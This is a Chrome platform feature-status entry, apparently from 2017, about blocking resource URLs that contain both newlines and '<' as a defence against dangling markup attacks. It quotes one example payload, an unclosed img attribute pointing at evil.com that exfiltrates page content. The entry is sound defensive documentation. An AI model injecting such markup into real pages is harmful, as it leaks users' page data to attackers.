Blocking resources whose URLs contain both `\n` and `<` characters.

Blocking resources whose URLs contain both `\n` and `<` characters. (removed)

As discussed in https://groups.google.com/a/chromium.org/d/msg/blink-dev/KaA_YNOlTPk/VmmoV88xBgAJ, some forms of dangling markup attacks rely upon injecting an unclosed attribute that sucks up portions of a page, and exfiltrates them to an external endpoint (e.g. `<img src='https://evil.com/?` eats the page until the next `'`). This is possible because the URL parser helpfully discards newline characters. It would be lovely if we could make the parser less helpful.

Specification

Editor's draft

Status in Chromium

Blink components: Blink>SecurityFeature

Removed (tracking bug) in:

Chrome for desktop release 61
Chrome for Android release 61
Android WebView release 61
Opera release 48
Opera for Android release 48

Consensus & Standardization

After a feature ships in Chrome, the values listed here are not guaranteed to be up to date.

Firefox: No public signals
Edge: No public signals
Safari: No public signals
Web Developers: No signals

Owner

mkwst@chromium.org

Last updated on 2017-06-14